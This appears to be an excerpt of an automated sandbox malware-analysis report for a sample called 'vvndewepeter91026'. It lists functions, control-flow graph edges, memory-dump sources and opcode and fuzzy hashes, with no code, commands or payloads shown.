                                                control_flow_graph 1230 c32ad8-c32afd 1231 c32b04-c32b6b 1230->1231 1232 c32aff 1230->1232 1237 c32bf5-c32bfb 1231->1237 1232->1231 1238 c32c01-c32c19 1237->1238 1239 c32b70-c32b83 1237->1239 1242 c32c1b-c32c28 1238->1242 1243 c32c2a-c32c4a LdrInitializeThunk 1238->1243 1240 c32b85 1239->1240 1241 c32b8a-c32bc6 1239->1241 1240->1241 1252 c32bd9-c32beb 1241->1252 1253 c32bc8-c32bd6 1241->1253 1244 c32c4c-c32d27 1242->1244 1243->1244 1247 c32d29-c32d2e 1244->1247 1248 c32d2f-c32d38 1244->1248 1247->1248 1256 c32bf2 1252->1256 1257 c32bed 1252->1257 1253->1238 1256->1237 1257->1256
                                                APIs
                                                • LdrInitializeThunk.NTDLL(000000FF), ref: 00C32C3A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 40dfda4479483044f7bd260ea619921066174e53c838524b528f4f547819dc9c
                                                • Instruction ID: 783a58b09390a1893162b7cd1b3d609ae7b44d6595740b790cbbca5a69b61bc6
                                                • Opcode Fuzzy Hash: 40dfda4479483044f7bd260ea619921066174e53c838524b528f4f547819dc9c
                                                • Instruction Fuzzy Hash: 6551F0B4D10218DFDB18CFAAD8846DDBBB2BF88314F20D52AE415AB294D7749945CF50
                                                Function 00C32C73 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1258 c32c73-c32c7d 1259 c32c89-c32c8c 1258->1259 1260 c32c7f-c32c87 1258->1260 1261 c32c8f-c32c95 1259->1261 1260->1261 1262 c32c97 1261->1262 1263 c32c9e-c32c9f 1261->1263 1262->1263 1264 c32c52-c32c64 1262->1264 1265 c32d0e-c32d1b 1263->1265 1266 c32c66 1264->1266 1267 c32c6d-c32c6e 1264->1267 1285 c32d23-c32d27 1265->1285 1266->1263 1266->1264 1266->1267 1269 c32c01-c32c19 1266->1269 1270 c32b44-c32b4b 1266->1270 1271 c32c2a-c32c4a LdrInitializeThunk 1266->1271 1272 c32bc8-c32bd2 1266->1272 1273 c32c4c-c32c4d 1266->1273 1274 c32b52-c32b6b 1266->1274 1275 c32b70-c32b83 1266->1275 1276 c32b37-c32b3d 1266->1276 1277 c32bd5-c32bd6 1266->1277 1278 c32c1b-c32c28 1266->1278 1279 c32bda-c32beb 1266->1279 1280 c32bd8 1266->1280 1267->1265 1269->1271 1269->1278 1270->1274 1271->1273 1272->1277 1273->1285 1284 c32bf5-c32bfb 1274->1284 1281 c32b85 1275->1281 1282 c32b8a-c32bc6 1275->1282 1276->1270 1277->1269 1278->1273 1286 c32bf2 1279->1286 1287 c32bed 1279->1287 1283 c32bd9 1280->1283 1281->1282 1282->1272 1282->1283 1283->1279 1284->1269 1284->1275 1288 c32d29-c32d2e 1285->1288 1289 c32d2f-c32d38 1285->1289 1286->1284 1287->1286 1288->1289
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: db8477cbfd77984d10709c8a1acf6cc2aea1b9e000e45abb4ee2446b1446fa08
                                                • Instruction ID: 65cc37d1147089ca5f7a54bae30f953bb0387cd108386b074b3358fb3abda671
                                                • Opcode Fuzzy Hash: db8477cbfd77984d10709c8a1acf6cc2aea1b9e000e45abb4ee2446b1446fa08
                                                • Instruction Fuzzy Hash: 3751FF74D10208CFDF14CFA9E484ADDBBB1BF49314F20952AE42ABB2A4D7749986CF50
                                                Function 0023E2AB Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1295 23e2ab 1296 23e36a-23e37b 1295->1296 1297 23e382-23e38b 1296->1297 1298 23e37d 1296->1298 1300 23e163-23e188 1297->1300 1301 23e391-23e3a4 1297->1301 1298->1297 1304 23e18a 1300->1304 1305 23e18f-23e1c5 1300->1305 1302 23e3a6 1301->1302 1303 23e3ab-23e3c6 1301->1303 1302->1303 1306 23e3c8 1303->1306 1307 23e3cd-23e3e1 1303->1307 1304->1305 1313 23e1c7 1305->1313 1314 23e1cc-23e1fe 1305->1314 1306->1307 1311 23e3e3 1307->1311 1312 23e3e8-23e3fe LdrInitializeThunk 1307->1312 1311->1312 1315 23e400-23e4fc 1312->1315 1313->1314 1320 23e262-23e275 1314->1320 1321 23e200-23e225 1314->1321 1318 23e504-23e50e 1315->1318 1319 23e4fe-23e503 1315->1319 1319->1318 1322 23e277 1320->1322 1323 23e27c-23e2a1 1320->1323 1324 23e227 1321->1324 1325 23e22c-23e25a 1321->1325 1322->1323 1329 23e2a3-23e2a4 1323->1329 1330 23e2b0-23e2e8 1323->1330 1324->1325 1325->1320 1329->1301 1331 23e2ea 1330->1331 1332 23e2ef-23e350 1330->1332 1331->1332 1337 23e352 1332->1337 1338 23e357-23e369 1332->1338 1337->1338 1338->1296
                                                APIs
                                                • LdrInitializeThunk.NTDLL(00000000), ref: 0023E3ED
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913048420.0000000000230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00230000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_230000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3e8a652310cc7387f7e1fbea558059c5a116a3dc4110341cf099618ec969e1e6
                                                • Instruction ID: d4512f256fe80aeedb135be2f20b979d6ce1b301a99b0a84a4e734a73f1fdba0
                                                • Opcode Fuzzy Hash: 3e8a652310cc7387f7e1fbea558059c5a116a3dc4110341cf099618ec969e1e6
                                                • Instruction Fuzzy Hash: A7115CB4A102099FDF04DFA8C8C4AADB7B5FF88308F658665E808A7281D774A9598B50
                                                Function 005F9640 Relevance: .2, Instructions: 171COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913419888.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_5f0000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7ef7d5c3ed0b22e57e731603eb98938fd896906de04c5aea0940c67cb1b2a146
                                                • Instruction ID: 953bbc387d4b90594ec8f6dd48a76d193c9fc842f675d52cd946a4be9bc7a2d8
                                                • Opcode Fuzzy Hash: 7ef7d5c3ed0b22e57e731603eb98938fd896906de04c5aea0940c67cb1b2a146
                                                • Instruction Fuzzy Hash: 0771C374E00218CFDB14DFA5D991BAEBBB2FF89300F248529D405AB359DB39A942CF50
                                                Function 00C14330 Relevance: .2, Instructions: 171COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7a95f2d87bd9139916dd355889ad136e83b0ab53b454d59ffe1eb947982eba0
                                                • Instruction ID: f61f7abb1a60564235f207f33d392657989739d658ac1266af00152317551ef4
                                                • Opcode Fuzzy Hash: c7a95f2d87bd9139916dd355889ad136e83b0ab53b454d59ffe1eb947982eba0
                                                • Instruction Fuzzy Hash: 4671B674E00218CFDB18DFA5D891AEEBBB2FF89300F248529D415AB359DB35A942DF50
                                                Function 00D60038 Relevance: .2, Instructions: 170COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913756021.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_d60000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: de5a8a71f9ee1194b09412de9fc22c2075f7b941c344beed8ce4b253d4c74638
                                                • Instruction ID: bd8d2f34e0c421b4c4f69c435d4c8b9a6b0aca41faf93c0be8873ad5d5ab0049
                                                • Opcode Fuzzy Hash: de5a8a71f9ee1194b09412de9fc22c2075f7b941c344beed8ce4b253d4c74638
                                                • Instruction Fuzzy Hash: 3881A374E412298FDB65DF65D990BDDBBB2AF89300F1080EAE54DA7254DB319E81CF40
                                                Function 00D61BC0 Relevance: .1, Instructions: 117COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913756021.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_d60000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97aa77bddcf142cf389ff342ee12a63a258eee38a8f2b4f54d809310bace1269
                                                • Instruction ID: 15dee2e225feaa0d6131c66bce38f64924bbe10ac82d367b32e98f9ad13be615
                                                • Opcode Fuzzy Hash: 97aa77bddcf142cf389ff342ee12a63a258eee38a8f2b4f54d809310bace1269
                                                • Instruction Fuzzy Hash: 5C41C174E00248CFDB04DFA9D9987DDBBF5BF89300F14912AE805A7294EB786A46CF50
                                                Function 00D61BD0 Relevance: .1, Instructions: 111COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913756021.0000000000D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_d60000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 88786e8d0a1f86bf3cb073515126a36f9f9e0b35e44dbf1c827acb2ca0f8b6a7
                                                • Instruction ID: 2ad826fb572204d1186a57b825ec9d52d7e97031d3c38958723a7a737e03286d
                                                • Opcode Fuzzy Hash: 88786e8d0a1f86bf3cb073515126a36f9f9e0b35e44dbf1c827acb2ca0f8b6a7
                                                • Instruction Fuzzy Hash: 9041A178E00218CFDB04DFA9D5947EDBBF5BF89300F14912AE805A7294EB786A46CF50
                                                Function 00C1A5DB Relevance: .1, Instructions: 94COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 06e02103dfa3e66daf865e6a1b41b1994487f8220ce58893641d407ac3863479
                                                • Instruction ID: 903e7e239e224b5615e907e60af7d731254627d5356e364745b7c6c9c775182b
                                                • Opcode Fuzzy Hash: 06e02103dfa3e66daf865e6a1b41b1994487f8220ce58893641d407ac3863479
                                                • Instruction Fuzzy Hash: BE31C274E012488FDB08DFAAD8546EDBBF2BF8A300F54D12AD418AB254EB345942DF55
                                                Function 00C14325 Relevance: .1, Instructions: 90COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 715a001f3f18b1e247b9c721e073b0d043f93295ea3388127e6237bc6e5fd10d
                                                • Instruction ID: 8862da875b16937ff61c876fbfbfcf4df6e43b467769ad86bb9150e8d5d69cdc
                                                • Opcode Fuzzy Hash: 715a001f3f18b1e247b9c721e073b0d043f93295ea3388127e6237bc6e5fd10d
                                                • Instruction Fuzzy Hash: DD31C374E002088FDF08DFAAD5856EDBBF2AFCA300F64912AD419BB254DB345A42DF54
                                                Function 000BD044 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.912980358.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_bd000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 34dca864cef1ef255c797b367cb77f8e7eb13b88ab4d5ea9f8277c203c69efec
                                                • Instruction ID: 30370a77bcc882a2a70fdf73575d12b8b209a87e9bf98ab05afce33d02e1a46f
                                                • Opcode Fuzzy Hash: 34dca864cef1ef255c797b367cb77f8e7eb13b88ab4d5ea9f8277c203c69efec
                                                • Instruction Fuzzy Hash: F0212571614300EFDB10DF14C8C4B56FBA1FB84314F34C96AD8494B242D73AD846CB61
                                                Function 000BD03F Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.912980358.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_bd000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                • Instruction ID: 9bb463bb3d63850c67ceae865b843bad0541eae916f63892e906e253e3ac667e
                                                • Opcode Fuzzy Hash: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                • Instruction Fuzzy Hash: F0119D75504284DFDB11CF14D9C4B55FFA1FB84314F24CAAAD8494B656C33AD84ACFA2

                                                Non-executed Functions

                                                Function 006080A0 Relevance: .3, Instructions: 300COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 22f53536246eff8be004f49d046e886737e8314e136d5d53b69d36165fc2feaf
                                                • Instruction ID: a9b638c8b2f820b7a79ae80177a896e65f650e5b0e7d6aac4c6ae719391f7ec4
                                                • Opcode Fuzzy Hash: 22f53536246eff8be004f49d046e886737e8314e136d5d53b69d36165fc2feaf
                                                • Instruction Fuzzy Hash: E8E1C174E01218CFDB64DFA5C984B9DBBB2BF89300F2085AAD809B7395DB355A85CF50
                                                Function 00C3DE88 Relevance: .3, Instructions: 296COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913678445.0000000000C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C30000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c30000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 664cd35d2a39a0966b82f2835c24435283f2f5e66e6e073035c61a7277620fe8
                                                • Instruction ID: 27ffea65af5e1acf8b16ec784b7a883c3cf2afd84bcbb24dce7871ee8b61f917
                                                • Opcode Fuzzy Hash: 664cd35d2a39a0966b82f2835c24435283f2f5e66e6e073035c61a7277620fe8
                                                • Instruction Fuzzy Hash: B0E1C274E00218CFEB64DFA5C894BDDBBB2BF89304F2085AAD409A7395DB355A85CF50
                                                Function 00C109D0 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7e8ad191f143177f4aa3cd2c37ea6ef4f41dd392db7cc5c78e0e16aeb1e6634f
                                                • Instruction ID: 969342e7e0d7cba615662a2b49f34053c4ed776995b645af354b9c92d7288a05
                                                • Opcode Fuzzy Hash: 7e8ad191f143177f4aa3cd2c37ea6ef4f41dd392db7cc5c78e0e16aeb1e6634f
                                                • Instruction Fuzzy Hash: 68D19074E003188FDB54DFA5D994B9DBBB2BF89300F2081AAE409AB355DB359A81DF50
                                                Function 00C134D8 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f335305560674f50aaba649e507927190a799dd2b682b9852a85fe3dc0c9fc9e
                                                • Instruction ID: d3590e539f1264fb011336e931d284add2e3354fb115d25a26b5972644f583f0
                                                • Opcode Fuzzy Hash: f335305560674f50aaba649e507927190a799dd2b682b9852a85fe3dc0c9fc9e
                                                • Instruction Fuzzy Hash: 39D19E74E003188FDB54DFA5D994B9DBBB2BF89300F1081AAE409AB395DB359E81DF50
                                                Function 00C11CF0 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7fe4c07aea2bda18b37f225946ec3da64e51aed88adc551d2b6e3efbfaae11dd
                                                • Instruction ID: 77dac0a839ef8dadab7e05d11d0eb6b532a5bc4d01c894c700dd5dd015ac3940
                                                • Opcode Fuzzy Hash: 7fe4c07aea2bda18b37f225946ec3da64e51aed88adc551d2b6e3efbfaae11dd
                                                • Instruction Fuzzy Hash: 69D18F74E003188FDB54DFA5D894B9DBBB2BF89300F2481AAE409AB355DB359E81DF50
                                                Function 00C12680 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 190627e2e8d25409742aab50a221f16435f05b21e39dae402899b1ed49d3afc9
                                                • Instruction ID: 29d5b8c464e63718f1649bd52b0f24a6366649d11278c746c325cc28ad087370
                                                • Opcode Fuzzy Hash: 190627e2e8d25409742aab50a221f16435f05b21e39dae402899b1ed49d3afc9
                                                • Instruction Fuzzy Hash: 7FD19074E003188FDB54DFA5D894B9DBBB2BF89300F1081AAE409AB355DB359E81DF50
                                                Function 00C10E98 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04d9acdb28aaa42104f5cb23ee744a797b4440199679931e0f5f8ae465be591f
                                                • Instruction ID: 9a054529926de758cecf37996e048e8cd443ad9e2f7c8ab79b8f9cdf561e8ea2
                                                • Opcode Fuzzy Hash: 04d9acdb28aaa42104f5cb23ee744a797b4440199679931e0f5f8ae465be591f
                                                • Instruction Fuzzy Hash: D4D19174E003188FDB54DFA5D894B9DBBB2BF89300F2481AAE409AB355DB359E81DF50
                                                Function 00C139A0 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed0c92bc36bf36eabcb83c8eb129fd597a5811a4795c873547d1d4251ba56c9f
                                                • Instruction ID: 76b9b3b303996238ff097231cce24f789b34dc158330753b95cbdaaa5f3cbd0d
                                                • Opcode Fuzzy Hash: ed0c92bc36bf36eabcb83c8eb129fd597a5811a4795c873547d1d4251ba56c9f
                                                • Instruction Fuzzy Hash: AED19E74E003188FDB54DFA5D894B9DBBB2BF89300F2081AAE409AB355DB359E81DF50
                                                Function 00C121B8 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd2315234009af8b0482b3d3f3a0410b9292188c7000e3462fe9b4f3a66ee696
                                                • Instruction ID: 9cbbb9c2d1601abc29ff11f80f1df99e17507335d5c19a529afba6e1b50815aa
                                                • Opcode Fuzzy Hash: dd2315234009af8b0482b3d3f3a0410b9292188c7000e3462fe9b4f3a66ee696
                                                • Instruction Fuzzy Hash: 71D18E74E003188FDB54DFA5D894B9DBBB2BF89300F1081AAE409AB395DB359E81DF50
                                                Function 00C10040 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d879f927551d54511729d2caac3cad42937634a9c701f761084d15d3048d1bf0
                                                • Instruction ID: 132829886b49698b9ee0c7bd37dc7673571b136e77444e04de88032eaa8990ec
                                                • Opcode Fuzzy Hash: d879f927551d54511729d2caac3cad42937634a9c701f761084d15d3048d1bf0
                                                • Instruction Fuzzy Hash: 78D18E74E003188FDB54DFA5D895B9DBBB2BF89300F2081AAE409AB355DB359E81DF50
                                                Function 00C12B48 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4239d630f32ad3742f2804cc6e8995b930e2acaa1059b58ce9d582f1c0ffe8b5
                                                • Instruction ID: 4ac5be36c8de9f3b3614af79ec7f994407ee90905e6f02290684b8ee767e4d00
                                                • Opcode Fuzzy Hash: 4239d630f32ad3742f2804cc6e8995b930e2acaa1059b58ce9d582f1c0ffe8b5
                                                • Instruction Fuzzy Hash: 32D18074E003188FDB54DFA5D894B9DBBB2BF89300F1081AAE409AB355DB359E82DF50
                                                Function 00C13E68 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d812ba14c635b3568a499b0391f62c3ed7c976cb444f08c74a250b27fffbd391
                                                • Instruction ID: 1cd939a854cc930b8840fc775da860c6742d0b8a5c1b8cf93efc0987123a8c20
                                                • Opcode Fuzzy Hash: d812ba14c635b3568a499b0391f62c3ed7c976cb444f08c74a250b27fffbd391
                                                • Instruction Fuzzy Hash: E5D18F74E003188FDB54DFA5D894B9DBBB2BF89300F2081AAE419AB355DB359E81DF50
                                                Function 00C10508 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f7fcfef147d122986e2d544306e38644da7c21f338abcaddddec971242c02528
                                                • Instruction ID: 9901ebde50b2f669e74ff4cffb9c5a7485b2fb3aa2f71f1039b7228468d2b7f5
                                                • Opcode Fuzzy Hash: f7fcfef147d122986e2d544306e38644da7c21f338abcaddddec971242c02528
                                                • Instruction Fuzzy Hash: 62D19074E00218CFDB54DFA5D895B9DBBB2BF89300F2081AAE409AB355DB359A81DF50
                                                Function 00C13010 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7cc4c9f442ea21d8e0b84e3984588c655810cce361c055ed1047414aa45bb747
                                                • Instruction ID: 8b26acfb236059a187246ae7c72aaa41e3431f1cc3286d4bde7633e5e68a4d58
                                                • Opcode Fuzzy Hash: 7cc4c9f442ea21d8e0b84e3984588c655810cce361c055ed1047414aa45bb747
                                                • Instruction Fuzzy Hash: 6ED19F74E003188FDB54DFA5D994B9DBBB2BF89300F2081AAE409AB355DB359E81DF50
                                                Function 00C11828 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913620472.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_c10000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: adddaee5060af1ed3f46228ebbe1fb8250c5209cb305eef2cf840db88dc778b9
                                                • Instruction ID: 8620514454984313b0462c36787bb3148a22dad735c6f74bc6b3feb12f63fd27
                                                • Opcode Fuzzy Hash: adddaee5060af1ed3f46228ebbe1fb8250c5209cb305eef2cf840db88dc778b9
                                                • Instruction Fuzzy Hash: EED19F74E003188FDB54DFA5D894B9DBBB2BF89300F1481AAE409AB395DB359E81DF50
                                                Function 00609A68 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee0d7092432fa82bfbaebf6436c0f2a31193f3e05a1906214bd226febd32e9bb
                                                • Instruction ID: ba8b561ef5edb5dd9ad7771dfa2d455e5a9bb6614d86d41fa734c7d66bf94380
                                                • Opcode Fuzzy Hash: ee0d7092432fa82bfbaebf6436c0f2a31193f3e05a1906214bd226febd32e9bb
                                                • Instruction Fuzzy Hash: F4D18274E003188FDB54DFA5D895B9EBBB2BF89300F1481AAE409AB395DB355E81CF50
                                                Function 0060C570 Relevance: .3, Instructions: 292COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.913444389.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_600000_vvndewepeter91026.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d1fa94365b6f49e10ddca7db9ea0977b436f20ba858e021029462826362fbdb9
                                                • Instruction ID: d1612a42468165243b05fbb218325e10ba6d04730e78f3bfaaa991ccbe5687da
                                                • Opcode Fuzzy Hash: d1fa94365b6f49e10ddca7db9ea0977b436f20ba858e021029462826362fbdb9
